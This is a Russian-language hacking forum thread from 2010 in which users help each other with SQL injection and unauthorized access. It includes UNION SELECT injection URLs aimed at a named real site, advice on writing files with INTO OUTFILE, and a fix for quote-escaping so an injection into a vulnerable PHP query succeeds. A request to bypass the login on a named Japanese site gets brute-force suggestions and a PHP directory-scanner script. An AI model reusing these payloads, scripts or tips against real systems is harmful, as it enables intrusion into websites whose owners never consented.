Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.01.2010, 16:31
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
v1d0qz не имеет значение через что давать БД команды .. пхпмайадмин это всего лишь ГУИ ... поэтому файл если не ошибаюсь если не указываеть полную дерикторию зальётся в папку с Базой ... но в этом я не уверен =)
|
|
|
16.01.2010, 16:34
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
блин все таки вот пришлос в студию линк:
пххп://allbest.ru/union/search.cgi?q=1')%20union+select%201,2+--+
никакие запросы не подходит (( |
|
|
|
16.01.2010, 16:35
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178
Репутация:
30
|
|
Сообщение от v1d0qz
Вопросец, если через site.ru/phpmyadmin/ делать into outfile 'temp.txt', то куда по дефолту может скидываться файл, нету подручных средств чтобы проверить.
Если указать слэш перед названием, то зальется в корень, а если не указывать, как у тебя в примере, то он скорее всего зальется туда, где хранятся записи самого мускула, вот тебе резалт теста на локалхосте:
Запрос:
SELECT * FROM injection.uzaz INTO OUTFILE '/dump.txt'
Итоговое расположение:
[DISK]:\usr\local\mysql5\data\injection
|
|
|
|
16.01.2010, 17:38
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Серёжа393
Подскадите пожалуйста. Ума не приложу
Вот код:
PHP код:
include("config.php");
$response=mysql_query("SELECT * FROM articles WHERE id='".$_GET['id']."'");
$result=mysql_fetch_array($response);
...
echo "
<table width=\"100%\">
<tr><th>".$result['title']."</th></tr>
<tr><td><img src=".$result['image']." width=200><br>".$result['text']."</td></tr>
</table><br>
";
Почему не проходит инъекция? когда подставишь ковычку - ошибку есть mysql_fetch_array(). http://site.ru/script.php?id=-1'+union+select+1,2,3,4+--+
Будет работать при mq=off
А странно то, что если убрать рядом id ковычки одинарные, т.е. запрос станент таким
то обычная инъекция проходит! В чём такая странность из-за ковычек. подскажите плиз
PHP код:
mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");
Когда стоят кавычки '', запрос получается:
PHP код:
$response=mysql_query("SELECT * FROM articles WHERE id='1+union+select+1,3,4+--+'");
php вернет ошибку из-за незакрытой кавычки. Нужно закрыть кавычку и делать запрос:
PHP код:
$response=mysql_query("SELECT * FROM articles WHERE id='1' union select 1,2,3,4+--+'");
Читай: http://forum.antichat.ru/thread19844.html
Последний раз редактировалось .:[melkiy]:.; 15.02.2010 в 01:00..
|
|
|
|
16.01.2010, 18:09
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
елемент $_GET['id'] можно взять в {} чтоб запрос выполнялся ...
Iceangel_+ я прав (протестить негде)?
прав, но зачем? ведь но суть вопроса не в этом.
Сообщение от .:[melkiy
:.]MySql вернет ошибку из-за незакрытой кавычки.
бред, что за "незакрытая кавычка"? и в данном случае ошибку mysql_fetch_array возвращает не mysql, а php.
|
|
|
|
16.01.2010, 18:25
|
|
Новичок
Регистрация: 15.01.2010
Сообщений: 1
Провел на форуме:
998
Репутация:
0
|
|
Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо
|
|
|
|
16.01.2010, 18:36
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
так что с пххп://allbest.ru/union/search.cgi?q=1')%20union+select%201,2+--+ ничего незяли сделать?
|
|
|
|
16.01.2010, 18:37
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от guspertiz
Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо
Обойти никак, можно побрутить...
|
|
|
|
17.01.2010, 04:45
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178
Репутация:
30
|
|
Сообщение от guspertiz
Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо
Обойти можно, как правильно подметил nemaniak, только брутом. Попробуй просканить сайтец на полезные файлы/папки, авось и .htpasswd доступен для чтения  . Может че найдешь.
Лови скриптик на скорую руку
PHP код:
<form action='<?=$_SERVER[PHP_SELF]?>' method='POST'>
<pre>
URL without ending slash!:<a href='#' title='exmpl: http://www.site.com' style='text-decoration: none'>?</a><input type='text' name='host' size='50' /><br/>
File with dirs:<a href='#' title='exmpl: dirs.txt (with Path)' style='text-decoration: none'>?</a> <input type='text' name='dirs' size='50' value='./dirs.txt'/><br/>
<input type='submit' name='gogo' value='Scan' />
</pre>
</form>
<hr/>
<?php
if($_POST['gogo'] && trim($_POST['host']) != '' && trim($_POST['dirs']) != ''){
$host = $_POST['host'];
$dirs = @file($_POST['dirs']);
if (!$dirs) die ('Can`t open file');
foreach ($dirs as $v){
$temp = @get_headers($host.trim($v));
$found = false;
if (preg_match('#200#', $temp[0])) {echo $host.'<b>'.$v.'</b> found! <br/>';}
if (preg_match('#403#', $temp[0])) {echo $host.'<b>'.$v.'</b> is forbidden! <br/>';}
if (preg_match('#404#', $temp[0])) { continue;}
}
} else if ($_POST['gogo'] && (trim($_POST['host']) == '' || trim($_POST['dirs']) == '')) {
die('All fields required');
}
?>
Файл dirs должен быть вот такого вида:
/admin/
/admin.php
/indicator
...
|
|
|
|
17.01.2010, 04:58
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
авось и .htpasswd доступен для чтения
Не несите бред, еще с версий 1.* по дефолту в конфиге апача стоит deny на все .ht* файлы
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1833707){kind=avatar}
Похожие темы
Линейный вид
